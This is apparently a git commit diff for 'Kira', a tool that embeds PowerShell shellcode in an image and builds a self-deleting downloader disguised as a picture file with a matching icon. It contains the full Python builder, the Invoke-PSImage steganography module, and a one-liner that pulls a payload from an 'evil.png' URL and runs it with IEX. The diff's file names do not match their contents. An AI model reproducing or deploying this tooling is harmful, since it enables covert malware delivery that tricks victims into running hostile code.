Added Script for Automation

Author: ThoughtfulDev

.gitignore

@@ -0,0 +1,3 @@
+__pycache__
+tmp/
+dist/

README.md

@@ -1,70 +1,33 @@
-# Invoke-PSImage Delivery
-
-## What does this do?
-
-**The binary will download the image from the url save it as `mia.png` and then run the powershell payload from within the Image and then show the image which it just downloaded. After this it will delete itself**
+# Invoke-PSImage Delivery (alias: Kira)
+	║ K I R A
+	╔════════ ╗
+	║████████ ║
+	║УA†нηΘ†E║
+	║████████ ║
+	║████████ ║
+	║████████ ║
+	║████████ ║
+	╚════════ 
 
 
+## What does this do?
 
-1. Search for a Image
-2. get https://github.com/peewpw/Invoke-PSImage
-3. get `payload.ps1` and `bin.go` from this repo
-4. get rcedit (https://github.com/electron/rcedit)
-5. get upx
-6. get go
-
+**Embed a Powershell base64 encoded Shellcode into an Image  (Invoke-PSImage) an generate a Downloader for this Image. The Downloader will download the Image, extract the Shellcode and run it. Then it will delete itself and show the Image**
 
-## "Building"
+## Using
 
-1. Change Payload in `payload.ps1`
-*Default payload.ps1*
-```
-function InvokePayload
-{
-	powershell.exe -w hidden -noni -nop -enc <encoded string>
-};
-```
+**Tested with Python 3.5 - ONLY WINDOWS SUPPORTED**
 
-2. Build image
+Make sure that your Image is at least 720p (so that the payload can fit into the Image).
 
+On Windows install *GOLang* and add it to your path.
 ```
-PS> Import-Module .\Invoke-PSImage.ps1
-PS> Invoke-PSImage -Script .\payload.ps1 -Image your_image.jpg -Out evil_image.png
-```
-3. Copy the output (oneliner)
-4. Change line 31 in bin.go
+$ pip install -r requirements.txt
+$ python kira.py -img <your_img>
 ```
-var hi string = `$path = -join($pwd.path, "\mia.png"); sal a New-Object;Add-Type -AssemblyName "System.Drawing";$g= a System.Drawing.Bitmap($path);.....7647])); .\mia.png; del .\mia.png.exe; InvokePayload`
-```
-
-Be sure to replace the `sal` part until the `;` with your oneliner.
-Then replace `System.Drawing.Bitmap(...)` with `System.Drawing.Bitmap($path)`
-
-You should also change the filename (mine is mia.png(.exe))
-
-
-
-6. Change your webserver url in line 29 (upload your evil_image.png from step 2. to this host)
-
-7. Change the name `mia.png` to your desired name.
-8. Convert your original image to a ico. (i named it icon.ico)
-9. run `go build -ldflags="-s -w" bin.go` to build the go binary
-10. `.\rcedit.exe .\bin.exe --set-icon "icon.ico"`
-11. `.\upx.exe --ultra-brute -o mia.png.exe bin.exe` - Make sure to add the .exe after the filename which you chose the steps before
-
-12. RUN
-
-### What should happen:
-It should download the image from the URL which you specified.
-Then it should extract your payload.ps1 from this image and run the payload (from step 1).
-After this it opens the image which it downloaded (disguise) and deletes itself :)
-
-
-### why Mia.png???
-Cause i used a picture of [Mia Malkova](https://en.wikipedia.org/wiki/Mia_Malkova) for Testing.
-
+Then follow the Instructions of the Script.
 
-## Tools used
-[Invoke-PSImage](https://github.com/peewpw/Invoke-PSImage) - Huge Props to this dude
+# Tools used
+[Invoke-PSImage](https://github.com/peewpw/Invoke-PSImage) - *Huge Props to this dude*
 
 [rcedit](https://github.com/electron/rcedit)

bin.go

@@ -0,0 +1,99 @@
+from util import banner, success, error, warning, info
+import sys, os
+import argparse
+import subprocess
+import shutil
+import time
+import platform
+from PIL import Image
+
+def writeShellcode(sc):
+    info("Reading Template...")
+    with open('./res/payload.ps1', 'r') as p:
+        payload = p.read().replace('\n', '')
+    payload = payload.replace('<encoded>', sc)
+    with open('./tmp/payload.ps1', 'w') as f:
+        f.write(payload)
+    success("Wrote Temp Payload!")
+
+def makeEvilImage(img):
+    info("Generating Image...")
+    command = 'powershell -noprofile -executionpolicy bypass "Import-Module .\\res\\Invoke-PSImage.ps1; Invoke-PSImage -Script {0} -Image {1} -Out .\\dist\\{2}"'
+    if not os.path.isdir('./dist'):
+        os.makedirs('./dist')
+    payload = ".\\tmp\\payload.ps1"
+    outimg = img.split('.')
+    outimg = outimg[0] + ".png"
+    proc = subprocess.Popen(command.format(payload, img,outimg) ,
+                            stdout=subprocess.PIPE,
+                            stderr=subprocess.PIPE,
+                            shell=True)
+    data = proc.communicate()[0]
+    data = data.decode('utf-8').replace('\n', '')
+    success("Done - Image is .\\dist\\{0}".format(outimg))
+    info("Upload .\\dist\\{0} to a Webserver - NO IMGHOSTS SINCE THEY COMPRESS THE IMG".format(outimg))
+    host = input("Direct Link: ")
+    info("Reading Go Template")
+    with open('./res/bin.go', 'r') as p:
+        go_file = p.read()
+    go_file = go_file.replace('<urlhere>', host)
+    go_file = go_file.replace('<filename>', outimg)
+    go_file = go_file.replace('<psimage_output>', data)
+    bitmap_path = os.getcwd() + '\\dist\\' + outimg
+    go_file = go_file.replace('"{0}"'.format(bitmap_path), '$path')
+    info("Building Go Binary")
+    with open('./tmp/bin.go', 'w') as f:
+        f.write(go_file)
+    proc = subprocess.Popen('go build -ldflags="-s -w -H=windowsgui" .\\tmp\\bin.go',
+                            stdout=subprocess.PIPE,
+                            stderr=subprocess.PIPE,
+                            shell=True)
+    success("Build Binary")
+    time.sleep(5)
+
+    #Change Icon
+    icon = Image.open(img)
+    icon.save('./tmp/icon.ico', sizes=[(255, 255)])
+    subprocess.Popen('.\\res\\rcedit.exe bin.exe --set-icon .\\tmp\\icon.ico',
+                            stdout=subprocess.PIPE,
+                            stderr=subprocess.PIPE,
+                            shell=True)
+    time.sleep(2)
+    success("Icon Changed")
+    shutil.copyfile("bin.exe", ".\\dist\\" + outimg + ".exe")
+    os.remove("bin.exe")
+    info("Your file is .\\dist\\{0}.exe".format(outimg))
+    success("KTHXBYE")
+
+def requirementsCheck(img):
+    info("Checking Requirements")
+    if not os.path.isdir('./tmp'):
+        warning("tmp dir does not exist")
+        os.makedirs('./tmp')
+        success("Created tmp dir")
+    sc = input("Paste your Powershell base64 shellcode:")
+    writeShellcode(sc)
+    makeEvilImage(img)
+
+def cleanUp():
+    info("Cleaning...")
+    if os.path.isdir('./tmp'):
+        shutil.rmtree('./tmp')
+
+def main():
+    banner()
+    if not platform.system() == 'Windows':
+        error("Only Windows is supported")
+        sys.exit(2)
+    if len(sys.argv) <= 1:
+        error("Usage: kira.py -img <img>")
+    else:
+        parser = argparse.ArgumentParser(description='Hide a Powershell Payload in an Image')
+        parser.add_argument('-img', metavar='image_name', type=str, help='Image to inject payload in')
+        args = parser.parse_args()
+        requirementsCheck(args.img)
+
+    cleanUp()
+
+if __name__ == "__main__":
+    main()

kira.py

@@ -0,0 +1 @@
+pillow

requirements.txt

@@ -0,0 +1,149 @@
+function Invoke-PSImage
+{
+<#
+.SYNOPSIS
+
+Embeds a PowerShell script in an image and generates a oneliner to execute it.
+Author:  Barrett Adams (@peewpw)
+
+.DESCRIPTION
+
+Embeds a PowerShell script in an image by editing the least significant 4 bits of
+2 color values (2 of RGB) in each pixel (for as many pixels as are needed for the payload).
+Image quality will suffer as a result, but it still looks decent. The image is saved as a
+PNG, and can be losslessly compressed without affecting the ability to execute the payload
+as the data is stored in the colors themselves. It can accept most image types as input, but
+output will always be a PNG because it needs to be lossless.
+
+.PARAMETER Script
+
+The path to the script to embed in the Image.
+
+.PARAMETER Image
+
+The image to embed the script in.
+
+.PARAMETER Out
+
+The file to save the resulting image to (image will be a PNG)
+
+.PARAMETER Web
+
+Output a command for reading the image from the web instead of reading from a file.
+You will need to host the image and insert the URL into the command.
+
+.EXAMPLE
+
+PS>Import-Module .\Invoke-PSImage.ps1
+PS>Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Image .\kiwi.jpg -Out .\evil-kiwi.png
+   [Oneliner to execute from a file]
+   
+#>
+
+    [CmdletBinding()] Param (
+        [Parameter(Position = 0, Mandatory = $True)]
+        [String]
+        $Script,
+    
+        [Parameter(Position = 1, Mandatory = $True)]
+        [String]
+        $Image,
+    
+        [Parameter(Position = 2, Mandatory = $True)]
+        [String]
+        $Out,
+
+        [switch] $Web
+    )
+    # Stop if we hit an error instead of making more errors
+    $ErrorActionPreference = "Stop"
+
+    # Load some assemblies
+    [void] [System.Reflection.Assembly]::LoadWithPartialName("System.Drawing")
+    [void] [System.Reflection.Assembly]::LoadWithPartialName("System.Web")
+    
+    # Normalize paths beacuse powershell is sometimes bad with them.
+    if (-Not [System.IO.Path]::IsPathRooted($Script)){
+        $Script = [System.IO.Path]::GetFullPath((Join-Path (pwd) $Script))
+    }
+    if (-Not [System.IO.Path]::IsPathRooted($Image)){
+        $Image = [System.IO.Path]::GetFullPath((Join-Path (pwd) $Image))
+    }
+    if (-Not [System.IO.Path]::IsPathRooted($Out)){
+        $Out = [System.IO.Path]::GetFullPath((Join-Path (pwd) $Out))
+    }
+        
+    # Read in the script
+    $ScriptBlockString = [IO.File]::ReadAllText($Script)
+    $input = [ScriptBlock]::Create($ScriptBlockString)
+    $payload = [system.Text.Encoding]::ASCII.GetBytes($input)
+
+    # Read the image into a bitmap
+    $img = New-Object System.Drawing.Bitmap($Image)
+
+    $width = $img.Size.Width
+    $height = $img.Size.Height
+
+    # Lock the bitmap in memory so it can be changed programmatically.
+    $rect = New-Object System.Drawing.Rectangle(0, 0, $width, $height);
+    $bmpData = $img.LockBits($rect, [System.Drawing.Imaging.ImageLockMode]::ReadWrite, $img.PixelFormat)
+    $ptr = $bmpData.Scan0
+
+    # Copy the RGB values to an array for easy modification
+    $bytes  = [Math]::Abs($bmpData.Stride) * $img.Height
+    $rgbValues = New-Object byte[] $bytes;
+    [System.Runtime.InteropServices.Marshal]::Copy($ptr, $rgbValues, 0, $bytes);
+
+    # Check that the payload fits in the image 
+    if($bytes/2 -lt $payload.Length) {
+        Write-Error "Image not large enough to contain payload!"
+        $img.UnlockBits($bmpData)
+        $img.Dispose()
+        Break
+    }
+
+    # Generate a random string to use to fill other pixel info in the picture.
+    # (Calling get-random everytime is too slow)
+    $randstr = [System.Web.Security.Membership]::GeneratePassword(128,0)
+    $randb = [system.Text.Encoding]::ASCII.GetBytes($randstr)
+    
+    # loop through the RGB array and copy the payload into it
+    for ($counter = 0; $counter -lt ($rgbValues.Length)/3; $counter++) {
+        if ($counter -lt $payload.Length){
+            $paybyte1 = [math]::Floor($payload[$counter]/16)
+            $paybyte2 = ($payload[$counter] -band 0x0f)
+            $paybyte3 = ($randb[($counter+2)%109] -band 0x0f)
+        } else {
+            $paybyte1 = ($randb[$counter%113] -band 0x0f)
+            $paybyte2 = ($randb[($counter+1)%67] -band 0x0f)
+            $paybyte3 = ($randb[($counter+2)%109] -band 0x0f)
+        }
+        $rgbValues[($counter*3)] = ($rgbValues[($counter*3)] -band 0xf0) -bor $paybyte1
+        $rgbValues[($counter*3+1)] = ($rgbValues[($counter*3+1)] -band 0xf0) -bor $paybyte2
+        $rgbValues[($counter*3+2)] = ($rgbValues[($counter*3+2)] -band 0xf0) -bor $paybyte3
+    }
+
+    # Copy the array of RGB values back to the bitmap
+    [System.Runtime.InteropServices.Marshal]::Copy($rgbValues, 0, $ptr, $bytes)
+    $img.UnlockBits($bmpData)
+
+    # Write the image to a file
+    $img.Save($Out, [System.Drawing.Imaging.ImageFormat]::Png)
+    $img.Dispose()
+    
+    # Get a bunch of numbers we need to use in the oneliner
+    $rows = [math]::Ceiling($payload.Length/$width)
+    $array = ($rows*$width)
+    $lrows = ($rows-1)
+    $lwidth = ($width-1)
+    $lpayload = ($payload.Length-2)
+
+    if($web) {
+        $pscmd = "sal a New-Object;Add-Type -AssemblyName `"System.Drawing`";`$g= a System.Drawing.Bitmap((a Net.WebClient).OpenRead(`"http://example.com/evil.png`"));`$o= a Byte[] $array;(0..$lrows)|% {foreach(`$x in (0..$lwidth)){`$p=`$g.GetPixel(`$x,`$_);`$o[`$_*$width+`$x]=([math]::Floor((`$p.B -band 15)*16) -bor (`$p.G -band 15))}};IEX([System.Text.Encoding]::ASCII.GetString(`$o[0..$lpayload]))"
+    }
+    else {
+        $pscmd = "sal a New-Object;Add-Type -AssemblyName `"System.Drawing`";`$g= a System.Drawing.Bitmap(`"$Out`");`$o= a Byte[] $array;(0..$lrows)|% {foreach(`$x in (0..$lwidth)){`$p=`$g.GetPixel(`$x,`$_);`$o[`$_*$width+`$x]=([math]::Floor((`$p.B -band 15)*16) -bor (`$p.G -band 15))}};`$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString(`$o[0..$lpayload]))"
+    }
+
+    return $pscmd
+}